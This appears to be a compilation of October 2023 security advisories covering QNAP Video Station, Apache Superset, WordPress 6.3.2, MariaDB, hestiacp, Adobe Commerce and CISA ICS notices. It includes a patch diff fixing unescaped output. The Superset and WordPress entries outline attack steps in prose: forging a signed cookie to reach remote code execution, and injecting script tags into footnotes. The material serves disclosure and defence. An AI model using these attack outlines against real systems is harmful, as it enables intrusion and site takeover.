A cross-site scripting (XSS) vulnerability has been reported to affect Video Station. If exploited, the vulnerability could allow authenticated users to inject malicious code via a network.

We have already fixed the vulnerability in the following version:
Video Station 5.7.0 ( 2023/07/27 ) and later


Security ID : QSA-23-52

*   Release date : October 14, 2023
    
*   CVE identifier : CVE-2023-34975 | CVE-2023-34976 | CVE-2023-34977
    
*   Affected products: Video Station 5.7.x
    

**Summary**

Three vulnerabilities have been reported to affect Video Station:

*   CVE-2023-34975 and CVE-2023-34976: SQL injection vulnerabilities
*   CVE-2023-34977: Cross-site scripting (XSS) vulnerability

If exploited, these vulnerabilities could allow authenticated users to inject malicious code via a network.

We have already fixed the vulnerability in the following version:

Affected Product

Fixed Version

Video Station 5.7.x

Video Station 5.7.0 (2023/07/27) and later

**Recommendation**

To fix the vulnerability, we recommend updating Video Station to the latest version.

**Updating Video Station**

1.  Log on to QTS or QuTS hero as administrator.
2.  Open the **App Center** and then click  .  
    A search box appears.
3.  Type "Video Station" and then press **ENTER**.  
    Video Station appears in the search results.
4.  Click **Update**.  
    A confirmation message appears.  
    **Note:** The **Update** button is not available if your Video Station is already up to date.
5.  Click **OK**.  
    The application is updated.

**Attachment**

*   CVE-2023-34975.json
*   CVE-2023-34976.json
*   CVE-2023-34977.json

**Acknowledgements:** Kaibro

**Revision History:**  
V1.0 (October 14, 2023) - Published

CVE-2023-34977: Vulnerabilities in Video Station - Security Advisory

Apache Superset versions 2.0.0 and below utilize Flask with a known default secret key which is used to sign HTTP cookies. These cookies can therefore be forged. If a user is able to login to the site, they can decode the cookie, set their user_id to that of an administrator, and re-sign the cookie. This valid cookie can then be used to login as the targeted user. From there the Superset database is mounted, and credentials are pulled. A dashboard is then created. Lastly a pickled python payload can be set for that dashboard within Superset's database which will trigger the remote code execution. An attempt to clean up ALL of the dashboard key values and reset them to their previous values happens during the cleanup phase.

Apache Superset 2.0.0 Remote Code Execution

WordPress Core versions prior to 6.3.2 suffer from arbitrary shortcode execution, cross site scripting, denial of service, and information leakage vulnerabilities. Versions prior to 6.3.2 are vulnerable.

The newest WordPress patch includes fixes for 8 Medium-Severity security issues, several of which are trivial to exploit.

WordPress Core 6.3.2 was released today, on October 12, 2023. It includes a number of security fixes and additional hardening against commonly exploited vulnerabilities. While all of the vulnerabilities are of Medium severity, several of them are impactful enough to potentially allow site takeover, and thus the 6.3.2 update has the most significant security fixes we’ve seen in a while.

Many of these patches have been backported to every version of WordPress since 4.1, with just a few being backported to the major version in which the functionality was released. WordPress has supported automatic core updates for security releases since WordPress 3.7, and the vast majority of WordPress sites should receive a patch for their major version of WordPress automatically over the next 24 hours. We recommend verifying that your site has been automatically updated to one of the patched versions. Patched versions are available for every major version of WordPress since 4.1, so you can update without risking compatibility issues.

The Wordfence Threat Intelligence Team released two new firewall rules today to protect Wordfence Premium, Wordfence Care, and Wordfence Response customers against the most impactful vulnerabilities patched, and these rules will be available to free Wordfence users in 30 days, on November 11th, 2023.

If your site has not been updated automatically we strongly recommend updating manually as soon as possible, as one of the vulnerabilities patched in this release can be used by an attacker with a low-privileged contributor-level account to take over a site.

Technical Analysis and Overview

As with every WordPress core release containing security fixes, the Wordfence Threat Intelligence team analyzed the code changes in detail to evaluate the impact of these vulnerabilities on our customers, and to ensure our customers remain protected.

No More ShortCode Abuse

Description: WordPress Core <= 6.3.1 – Authenticated (Subscriber+) Arbitrary Shortcode Execution

Affected Versions: WordPress Core < 6.3.2

Researcher: James Golovich & WhiteCyberSec 

CVE ID: Pending

CVSS Score: 5.4(Medium)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Fully Patched Version: 6.3.2

Wordfence Intelligence Reference 

WordPress Core is vulnerable to arbitrary shortcode execution in versions up to, and including, 6.3.1 due to a lack of input validation on the ‘shortcode’ parameter in the parse_media_shortcode AJAX function. This allows authenticated attackers, with subscriber-level privileges and above, to execute arbitrary shortcodes.

While this patch does not address a specific vulnerability, it blocks a common vector that enables attackers to exploit vulnerabilities that use shortcodes. Before WordPress 6.3.2, any authenticated user, including subscribers could execute any shortcode by calling the built-in ‘parse-media-shortcode’ AJAX handler.

The changeset in WordPress 6.3.2 restricts this AJAX handler to media shortcodes, and requires the ’embed’ shortcode to be associated with an active post ID that the user can access.

This means that a large range of SQL Injection, Sensitive Information Disclosure, and Remote Code Execution vulnerabilities that required only an active user login can now only be exploited by Contributor-level users or above.

You can find several of the shortcode-based vulnerabilities we reference by searching the Wordfence Intelligence vulnerability database.

Previously our team could not add a firewall rule to prevent the execution of arbitrary shortcodes due to the varying use cases. Fortunately, with this patch and change, the expected behavior of the parse-media-shortcode action has been restricted by WordPress Core, so we were able to create a generic firewall rule that will prevent arbitrary execution of shortcodes that are not in the allowlist from the function. Wordfence Premium, Care, and Response customers received this rule today, while those still on the free version of Wordfence will receive this rule after a 30 day delay on November 11th, 2023.

Reflected Cross-Site Scripting via Application Passwords

Description: WordPress Core 5.6-6.3.1 – Reflected Cross-Site Scripting via Application Password Requests

Affected Versions: WordPress Core < 6.3.2

Researcher: mascara7784 

CVE ID: Pending

CVSS Score: 6.1(Medium)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Fully Patched Version: 6.3.2

Wordfence Intelligence Reference 

WordPress Core is vulnerable to Reflected Cross-Site Scripting via the ‘success_url’ and ‘reject_url’ parameters when requesting application passwords in versions between 5.6 and 6.3.1 due to insufficient input sanitization and output escaping of pseudo protocol URIs. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link and accepting or rejecting the application password.

WordPress allows applications to request application passwords to be generated for them. WordPress before 6.3.2 fails to validate the redirect URIs used when a password is authorized or rejected, which means that an attacker could generate a URL for an application password request containing data: and javascript: pseduo protocol redirects. If the victim visits this URL on their site and approves or rejects the application password request, they could be redirected to a URI that executes JavaScript on their browser. WordPress 6.3.2 contains a patch for this issue.

As with all Cross-Site Scripting vulnerabilities, this can be used to take over a site by creating malicious administrators and backdoors.

All Wordfence users, including Wordfence free, Wordfence Premium, Wordfence Care, and Wordfence Response users are protected against this vulnerability by the Wordfence Firewall’s Built-in Cross-Site Scripting protection. Additionally, Wordfence disables application passwords by default.

Comment Visibility

Description: WordPress Core <= 6.3.1 – Authenticated(Contributor+) Sensitive Information Exposure via Comments on Protected Posts

Affected Versions: WordPress Core < 6.3.2

Researcher: JB Audras(WordPress Security Team) & Rafie Muhammad(Patchstack) 

CVE ID: Pending

CVSS Score: 4.3(Medium)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Fully Patched Version: 6.3.2

Wordfence Intelligence Reference 

WordPress Core is vulnerable to Sensitive Information Exposure in versions up to, and including, 6.3.1 via the comments listing. This allows authenticated users, with contributor-level privileges or above, to view comments on protected posts.

Prior to WordPress 6.3.2, it was possible for users to view comments on posts even when they did not have access to those posts. While this is in most cases a relatively low-impact issue, WordPress 6.3.2 contains a patch protecting the privacy of comments on private or protected posts.

Removing POP Chains

While WordPress Core has not had a known Object Injection vulnerability for some time, Object Injection vulnerabilities in various plugins and themes are regularly discovered by researchers, including Wordfence’s own in-house Threat Intelligence team.

All Object Injection vulnerabilities require POP chains in order to be successful. Prior to WordPress 6.3.2, potential POP chains were present in the WP_Theme, WP_Block_Type_Registry, WP_Block_Patterns_Registry, Requests/Session, Request/Iri, and Requests/Hooks classes. While we were unable to develop a functioning exploit for these in the time available, the patches involved indicate that they are designed to prevent unexpected Object Unserialization that could lead to Remote Code Execution. Credit to Marc Montpas of Automattic for discovering the vulnerable POP chains.

The Wordfence Threat Intelligence Team will continue reverse engineering this patch to determine if a firewall rule will be necessary, but at this time it has not received an official vulnerability entry because it is not technically a vulnerability on its own.

No More Searching By Email

Description: WordPress Core 4.7.0-6.3.1 – Sensitive Information Exposure via User Search REST Endpoint

Affected Versions: WordPress Core < 6.3.2

Researcher: Marc Montpas(Automattic) 

CVE ID: Pending

CVSS Score: 5.3(Medium)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Fully Patched Version: 6.3.2

Wordfence Intelligence Reference 

WordPress Core is vulnerable to Sensitive Information Exposure in versions between 4.7.0 and 6.3.1 via the User REST endpoint. While the search results do not display user email addresses unless the requesting user has the ‘list_users’ capability, the search is applied to the user_email column. This can allow unauthenticated attackers to brute force or verify the email addresses of users with published posts or pages on the site.

While WordPress prior to 6.3.2 did not directly display user email addresses to users without the “list_users” capability, it still searched the user email column in wp_users. This meant that it was possible to brute-force search or verify the email address of any user with a published post or page by including the partial email address in the search parameter, potentially impacting user privacy. The patch for this limits the search columns for users without the “list_users” capability to only the columns displayed.

Cache Poisoning Denial of Service

Description: WordPress Core 4.7.0-6.3.1 – Denial of Service via Cache Poisoning

Affected Versions: WordPress Core < 6.3.2

Researcher: s5s & raouf_maklouf 

CVE ID: Pending

CVSS Score: 5.3(Medium)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Fully Patched Version: 6.3.2

Wordfence Intelligence Reference 

WordPress Core is vulnerable to Denial of Service via Cache Poisoning in versions between 4.7.0 and 6.3.1. In cases where the X-HTTP-Method-Override header was sent in a request to a REST endpoint and the endpoint returned a 4xx error, the error could be cached, resulting in denial of service.

Responses to REST API requests are not cached for logged-in users, but WordPress Core before 6.3.2 had an edge case where, in heavily cached configurations, an unauthenticated attacker could send a request to the REST API using the X-HTTP-Method-Override header to a public endpoint and receive a 4xx error, either because the endpoint restricts access to those methods or does not support them at all. In cases where the error is cached, any other unauthenticated visitors attempting to retrieve data from that endpoint would see the cached 4xx error.

Contributor+ Stored Cross-Site Scripting in Footnotes

Description: WordPress Core 6.3-6.3.1 – Authenticated (Contributor+) Stored Cross-Site Scripting via Footnotes Block

Affected Versions: WordPress Core < 6.3.2

Researcher: Jorge Costa(WordPress Core Team) 

CVE ID: Pending

CVSS Score: 6.4(Medium)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Fully Patched Version: 6.3.2

Wordfence Intelligence Reference 

WordPress Core is vulnerable to Stored Cross-Site Scripting via the footnotes block in versions between 6.3 and 6.3.1 due to insufficient input sanitization and output escaping on the footnotes block. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

WordPress prior to 6.3.2 did not adequately sanitize the content of footnote blocks, allowing authenticated users, with Contributor-level privileges or above, to insert JavaScript that would execute when a page containing the footnotes was visited. While input is partially escaped on the client-side, it is possible to intercept a request and add unescaped script tags to the footnote metadata. WordPress has released a patch for this vulnerability in 6.3.2.

As with all Cross-Site Scripting vulnerabilities, this can be used to take over a site by creating malicious administrators and backdoors.

We have released a firewall rule to protect Wordfence Premium, Wordfence Care, and Wordfence Response users against this vulnerability, and free Wordfence users will receive the same protection in 30 days, on November 11th, 2023.

Contributor+ Stored Cross-Site Scripting in Navigation Links

Description: WordPress Core 5.9-6.3.1 – Authenticated(Contributor+) Stored Cross-Site Scripting via navigation attributes

Affected Versions: WordPress Core 5.9-6.3.1

Researcher: Rafie Muhammad & Edouard L of Patchstack 

CVE ID: Pending

CVSS Score: 6.4(Medium)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Fully Patched Version: 6.3.2

Wordfence Intelligence Reference 

WordPress Core is vulnerable to Stored Cross-Site Scripting via the arrow navigation block attributes in versions between 5.9 and 6.3.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor-level privileges and above to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

WordPress Core’s Block Editor includes a navigation block that includes arrows or chevrons to display previous and next posts. WordPress before 6.3.2 failed to adequately check or sanitize the attribute defining whether to use an arrow or a chevron. As a result, any user with access to the post editor could insert malicious JavaScript into the arrow navigation element, which would be executed whenever a visitor accessed that page.

As with all Cross-Site Scripting vulnerabilities, this can be used to take over a site by creating malicious administrators and backdoors. We were unable to successfully exploit this vulnerability at the time of publication, but will update this post if we are able to achieve a proof of concept, along with a firewall rule if needed to protect our users.

Conclusion

WordPress 6.3.2 includes patches for 5 Medium-Severity vulnerabilities as well as hardening against separate Object Injection vulnerabilities found in third-party plugins and themes. Several of these vulnerabilities are trivial to exploit and we recommend updating immediately if your site has not yet automatically done so.

We have released firewall rules to protect Wordfence Premium, Wordfence Care, and Wordfence Response customers against the most impactful vulnerabilities and these rules will be available to free Wordfence users in 30 days, on November 11th, 2023.

If you know someone who uses WordPress and isn’t keeping it automatically updated, we recommend sharing this advisory with them to ensure their site remains secure, as several of these vulnerabilities pose a significant risk.

For security researchers looking to disclose vulnerabilities responsibly and obtain a CVE ID, you can submit your findings to Wordfence Intelligence and potentially earn a spot on our leaderboard.

Special thanks to the security researchers who responsibly disclosed these vulnerabilities, as well as to Threat Intelligence Lead Chloe Chamberland for her assistance with this article and for writing the firewall rules to protect Wordfence customers.

WordPress Core 6.3.1 XSS / DoS / Arbitrary Shortcode Execution

Red Hat Security Advisory 2023-5684-01 - MariaDB is a multi-user, multi-threaded SQL database server that is binary compatible with MySQL. Issues addressed include a null pointer vulnerability.

The following data is constructed from data provided by Red Hat's json file at:

https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_5684.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive. Going forward, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: galera and mariadb security update  
Advisory ID:        RHSA-2023:5684-01  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2023:5684  
Issue date:         2023-10-12  
Revision:           01  
CVE Names:          CVE-2022-32081  
====================================================================

Summary: 

An update for galera and mariadb is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

MariaDB is a multi-user, multi-threaded SQL database server that is binary compatible with MySQL.

The following packages have been upgraded to a later upstream version: galera  
(26.4.14), mariadb (10.5.22).

Security Fix(es):

* mariadb: node crashes with Transport endpoint is not connected mysqld got signal 6 (CVE-2023-5157)

* mariadb: use-after-poison in prepare_inplace_add_virtual in handler0alter.cc (CVE-2022-32081)

* mariadb: assertion failure at table->get_ref_count() == 0 in dict0dict.cc (CVE-2022-32082)

* mariadb: segmentation fault via the component sub_select (CVE-2022-32084)

* mariadb: server crash in st_select_lex_unit::exclude_level (CVE-2022-32089)

* mariadb: server crash in JOIN_CACHE::free or in copy_fields (CVE-2022-32091)

* mariadb: compress_write() fails to release mutex on failure (CVE-2022-38791)

* mariadb: NULL pointer dereference in spider_db_mbase::print_warnings() (CVE-2022-47015)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2022-32081

References:

https://access.redhat.com/security/updates/classification/#important

Red Hat Security Advisory 2023-5684-01

Red Hat Security Advisory 2023-5683-01 - MariaDB is a multi-user, multi-threaded SQL database server that is binary compatible with MySQL. Issues addressed include a null pointer vulnerability.

The following data is constructed from data provided by Red Hat's json file at:

https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_5683.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive. Going forward, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: mariadb:10.5 security update  
Advisory ID:        RHSA-2023:5683-01  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2023:5683  
Issue date:         2023-10-12  
Revision:           01  
CVE Names:          CVE-2022-32081  
====================================================================

Summary: 

An update for the mariadb:10.5 module is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

MariaDB is a multi-user, multi-threaded SQL database server that is binary compatible with MySQL. 

The following packages have been upgraded to a later upstream version: galera  
(26.4.14), mariadb (10.5.22).

Security Fix(es):

* mariadb: node crashes with Transport endpoint is not connected mysqld got signal 6 (CVE-2023-5157)

* mariadb: use-after-poison in prepare_inplace_add_virtual in handler0alter.cc (CVE-2022-32081)

* mariadb: assertion failure at table->get_ref_count() == 0 in dict0dict.cc (CVE-2022-32082)

* mariadb: segmentation fault via the component sub_select (CVE-2022-32084)

* mariadb: server crash in st_select_lex_unit::exclude_level (CVE-2022-32089)

* mariadb: server crash in JOIN_CACHE::free or in copy_fields (CVE-2022-32091)

* mariadb: compress_write() fails to release mutex on failure (CVE-2022-38791)

* mariadb: NULL pointer dereference in spider_db_mbase::print_warnings() (CVE-2022-47015)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2022-32081

References:

https://access.redhat.com/security/updates/classification/#important

Red Hat Security Advisory 2023-5683-01

Cross-site Scripting (XSS) - Stored in GitHub repository hestiacp/hestiacp prior to 1.8.6.

Expand Up @@ -512,7 +512,7 @@ class="form-control js-password-input" class\="form-control" name\="v\_mysql\_url" id\="v\_mysql\_url" value\="<?= $\_SESSION\["DB\_PMA\_ALIAS"\] ?>" value\="<?= htmlentities($\_SESSION\["DB\_PMA\_ALIAS"\]); ?>" \> </div\> <div class\="u-mb10"\> Expand Down Expand Up @@ -618,7 +618,7 @@ class="form-control" <label for\="v\_pgsql\_url" class\="form-label"\> <?= \_("phpPgAdmin Alias") ?> </label\> <input type\="text" class\="form-control" name\="v\_pgsql\_url" id\="v\_pgsql\_url" value\="<?= $\_SESSION\["DB\_PGA\_ALIAS"\] ?>"\> <input type\="text" class\="form-control" name\="v\_pgsql\_url" id\="v\_pgsql\_url" value\="<?= htmlentities($\_SESSION\["DB\_PGA\_ALIAS"\]) ?>"\> </div\> <?php } ?> <?php if ($v\_pgsql == "yes") { Expand Down Expand Up @@ -727,7 +727,7 @@ class="u-ml5" class\="form-control" name\="v\_backup\_dir" id\="v\_backup\_dir" value\="<?= trim($v\_backup\_dir, "'") ?>" value\="<?= htmlentities(trim($v\_backup\_dir, "'")) ?>" disabled \> </div\> Expand Down Expand Up @@ -785,7 +785,7 @@ class="form-select" class\="form-control" name\="v\_backup\_host" id\="v\_backup\_host" value\="<?= trim($v\_backup\_host, "'") ?>" value\="<?= htmlentities(trim($v\_backup\_host, "'")) ?>" \> </div\> <div class\="u-mb20"\> Expand All @@ -797,7 +797,7 @@ class="form-control" class\="form-control" name\="v\_backup\_port" id\="v\_backup\_port" value\="<?= trim($v\_backup\_port, "'") ?>" value\="<?= htmlentities(trim($v\_backup\_port, "'")) ?>" \> </div\> <div class\="u-mb10"\> Expand All @@ -809,7 +809,7 @@ class="form-control" class\="form-control" name\="v\_backup\_username" id\="v\_backup\_username" value\="<?= trim($v\_backup\_username, "'") ?>" value\="<?= htmlentities(trim($v\_backup\_username, "'")) ?>" \> </div\> <div class\="u-mb20"\> Expand All @@ -822,7 +822,7 @@ class="form-control" class\="form-control js-password-input" name\="v\_backup\_password" id\="v\_backup\_password" value\="<?= trim($v\_backup\_password, "'") ?>" value\="<?= htmlentities(trim($v\_backup\_password, "'")) ?>" \> </div\> </div\> Expand All @@ -835,7 +835,7 @@ class="form-control js-password-input" class\="form-control" name\="v\_backup\_bpath" id\="v\_backup\_bpath" value\="<?= trim($v\_backup\_bpath, "'") ?>" value\="<?= htmlentities(trim($v\_backup\_bpath, "'")) ?>" \> </div\> </div\> Expand All @@ -849,7 +849,7 @@ class="form-control" class\="form-control" name\="v\_backup\_bucket" id\="v\_backup\_bucket" value\="<?= trim($v\_backup\_bucket, "'") ?>" value\="<?= htmlentities(trim($v\_backup\_bucket, "'")) ?>" \> </div\> <div class\="u-mb10"\> Expand All @@ -861,7 +861,7 @@ class="form-control" class\="form-control" name\="v\_backup\_application\_id" id\="v\_backup\_application\_id" value\="<?= trim($v\_backup\_application\_id, "'") ?>" value\="<?= htmlentities(trim($v\_backup\_application\_id, "'")) ?>" \> </div\> <div class\="u-mb10"\> Expand All @@ -873,7 +873,7 @@ class="form-control" class\="form-control" name\="v\_backup\_application\_key" id\="v\_backup\_application\_key" value\="<?= trim($v\_backup\_application\_key, "'") ?>" value\="<?= htmlentities(trim($v\_backup\_application\_key, "'")) ?>" \> </div\> </div\> Expand All @@ -887,7 +887,7 @@ class="form-control" class\="form-control" name\="v\_rclone\_host" id\="v\_rclone\_host" value\="<?= trim($v\_rclone\_host, "'") ?>" value\="<?= htmlentities(trim($v\_rclone\_host, "'")) ?>" \> </div\> <div class\="u-mb10"\> Expand All @@ -899,7 +899,7 @@ class="form-control" class\="form-control" name\="v\_rclone\_path" id\="v\_rclone\_path" value\="<?= trim($v\_rclone\_path, "'") ?>" value\="<?= htmlentities(trim($v\_rclone\_path, "'")) ?>" \> </div\> </div\> Expand Down Expand Up @@ -946,33 +946,33 @@ class="form-control u-min-height100 u-console" <ul class\="values-list"\> <li class\="values-list-item"\> <span class\="values-list-label"\><?= \_("Issued To") ?></span\> <span class\="values-list-value"\><?= $v\_ssl\_subject ?></span\> <span class\="values-list-value"\><?= htmlentities($v\_ssl\_subject) ?></span\> </li\> <?php if ($v\_ssl\_aliases) { ?> <li class\="values-list-item"\> <span class\="values-list-label"\><?= \_("Alternate") ?></span\> <span class\="values-list-value"\><?= $v\_ssl\_aliases ?></span\> <span class\="values-list-value"\><?= htmlentities($v\_ssl\_aliases) ?></span\> </li\> <?php } ?> <li class\="values-list-item"\> <span class\="values-list-label"\><?= \_("Not Before") ?></span\> <span class\="values-list-value"\><?= $v\_ssl\_not\_before ?></span\> <span class\="values-list-value"\><?= htmlentities($v\_ssl\_not\_before) ?></span\> </li\> <li class\="values-list-item"\> <span class\="values-list-label"\><?= \_("Not After") ?></span\> <span class\="values-list-value"\><?= $v\_ssl\_not\_after ?></span\> <span class\="values-list-value"\><?= htmlentities($v\_ssl\_not\_after) ?></span\> </li\> <li class\="values-list-item"\> <span class\="values-list-label"\><?= \_("Signature") ?></span\> <span class\="values-list-value"\><?= $v\_ssl\_signature ?></span\> <span class\="values-list-value"\><?= htmlentities($v\_ssl\_signature) ?></span\> </li\> <li class\="values-list-item"\> <span class\="values-list-label"\><?= \_("Key Size") ?></span\> <span class\="values-list-value"\><?= $v\_ssl\_pub\_key ?></span\> <span class\="values-list-value"\><?= htmlentities($v\_ssl\_pub\_key) ?></span\> </li\> <li class\="values-list-item"\> <span class\="values-list-label"\><?= \_("Issued By") ?></span\> <span class\="values-list-value"\><?= $v\_ssl\_issuer ?></span\> <span class\="values-list-value"\><?= htmlentities($v\_ssl\_issuer) ?></span\> </li\> </ul\> </div\> Expand Down

CVE-2023-4517: Security patch for XSS in Edit server (#3946) · hestiacp/hestiacp@d30e3ed

Adobe Commerce versions 2.4.7-beta1 (and earlier), 2.4.6-p2 (and earlier), 2.4.5-p4 (and earlier) and 2.4.4-p5 (and earlier) are affected by a Uncontrolled Resource Consumption vulnerability that could lead in minor application denial-of-service. Exploitation of this issue does not require user interaction.

Security update available for Adobe Commerce | APSB23-50  

Bulletin ID

Date Published

Priority

APSB23-50

October 10, 2023  

3

**Summary**

Adobe has released a security update for Adobe Commerce and Magento Open Source. This update resolves critical and important vulnerabilities.  Successful exploitation could lead to arbitrary code execution, privilege escalation, arbitrary file system read, security feature bypass and application denial-of-service.

**Affected Versions**

**Product**

**Version**

**Platform**

 Adobe Commerce  

2.4.7-beta1 and earlier  
2.4.6-p2 and earlier  
2.4.5-p4 and earlier  
2.4.4-p5 and earlier  
2.4.3-ext-4 and earlier\*  
2.4.2-ext-4 and earlier\*  
2.4.1-ext-4 and earlier\*  
2.4.0-ext-4 and earlier\*  
2.3.7-p4-ext-4 and earlier\*  

All

Magento Open Source

2.4.7-beta1 and earlier  
2.4.6-p2 and earlier  
2.4.5-p4 and earlier  
2.4.4-p5 and earlier  

All

**Note: For clarity, the affected versions listed are now listed for each release line instead of only the most recent versions.  
\* These versions are only applicable to customers participating in the** Extended Support Program

**Solution**

Adobe categorizes these updates with the following priority ratings and recommends users update their installation to the newest version.

Product

Updated Version

Platform

Priority Rating

Installation Instructions

Adobe Commerce  

2.4.7-beta2 for 2.4.7-beta1 and earlier  
2.4.6-p3 for 2.4.6-p2 and earlier  
2.4.5-p5 for 2.4.5-p4 and earlier  
2.4.4-p6 for 2.4.4-p5 and earlier  
2.4.3-ext-5 for 2.4.3-ext-4 and earlier\*  
2.4.2-ext-5 for 2.4.2-ext-4 and earlier\*  
2.4.1-ext-5 for 2.4.1-ext-4 and earlier\*  
2.4.0-ext-5 for 2.4.0-ext-4 and earlier\*  
2.3.7-p4-ext-5 for 2.3.7-p4-ext-4 and earlier\*  

All  

3

2.4.x release notes

Magento Open Source   

2.4.7-beta2 for 2.4.7-beta1 and earlier  
2.4.6-p3 for 2.4.6-p2 and earlier  
2.4.5-p5 for 2.4.5-p4 and earlier  
2.4.4-p6 for 2.4.4-p5 and earlier  

All  

3

**Note: \* These versions are only applicable to customers participating in the** Extended Support Program

**Vulnerability Details**

Vulnerability Category

Vulnerability Impact

Severity

Authentication required to exploit?

Exploit requires admin privileges?  

**CVSS base score**  

**CVSS vector**  

CVE number(s)

Improper Input Validation (CWE-20)  

Privilege escalation  

Critical

No

No

8.8

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H  

CVE-2023-38218  

Cross-site Scripting (Stored XSS) (CWE-79)  

Privilege escalation  

Critical

Yes

Yes

8.4

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H  

CVE-2023-38219  

Improper Authorization (CWE-285)  

Security feature bypass  

Critical

Yes

No

7.5

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N  

CVE-2023-38220  

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') (CWE-89)  

Arbitrary code execution  

Critical

Yes

Yes

8.0

CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H  

CVE-2023-38221  

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') (CWE-89)  

Arbitrary code execution  

Critical

Yes

Yes

8.0

CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H  

CVE-2023-38249  

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') (CWE-89)  

Arbitrary code execution  

Critical

Yes

Yes

8.0

CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H  

CVE-2023-38250  

Information Exposure (CWE-200)  

Arbitrary code execution  

Critical  

Yes

Yes

7.6

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:L  

CVE-2023-26367  

Uncontrolled Resource Consumption (CWE-400)  

Application denial-of-service  

Important

No

No

5.3

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L  

CVE-2023-38251  

Server-Side Request Forgery (SSRF) (CWE-918)  

Arbitrary file system read  

Important  

Yes

Yes

6.8

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N  

CVE-2023-26366  

Cross-site Scripting (XSS) (CWE-79)  

Arbitrary code execution  

Important  

Yes

Yes

5.4

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N  

CVE-2023-26368  

Authentication required to exploit: The vulnerability is (or is not) exploitable without credentials.

  
Exploit requires admin privileges: The vulnerability is (or is not) only exploitable by an attacker with administrative privileges.

**Acknowledgements**

Adobe would like to thank the following researchers for reporting these issues and working with Adobe to help protect our customers:

*   wohlie - CVE-2023-38220, CVE-2023-38221, CVE-2023-38249, CVE-2023-38250, CVE-2023-38251, CVE-2023-26367  
    
*   Blaklis - CVE-2023-38219
*   fqdn - CVE-2023-38218
*   Sebastien Cantos (truff) - CVE-2023-26366
*   Yim Bryan H.T. (CITD) - CVE-2023-26368  
    

NOTE: Adobe has a private, invite-only, bug bounty program with HackerOne. If you are interested in working with Adobe as an external security researcher, please fill out this form for next steps.  

For more information, visit https://helpx.adobe.com/security.html, or email PSIRT@adobe.com.

CVE-2023-38251: Adobe Security Bulletin

By Waqas
New CISA Advisories Highlight Vulnerabilities in Siemens, Mitsubishi Electric, Hikvision, and Schneider Electric ICS Products.
This is a post from HackRead.com Read the original post: New CISA Advisories Highlight Vulnerabilities in Top ICS Products

It is important for users and administrators of ICS systems to take steps to mitigate the vulnerabilities identified in the CISA advisories.

The Cybersecurity and Infrastructure Security Agency (CISA) released nineteen Industrial Control Systems (ICS) advisories on October 12, 2023. These advisories provide timely information about current security issues, vulnerabilities, and exploits surrounding ICS.

The advisories cover a wide range of ICS products and vendors, including Siemens, Mitsubishi Electric, Hikvision, and Schneider Electric. The vulnerabilities identified in the advisories range in severity from low to critical. Some of the vulnerabilities could allow attackers to gain unauthorized access to ICS systems, disrupt operations, or even cause physical issues.

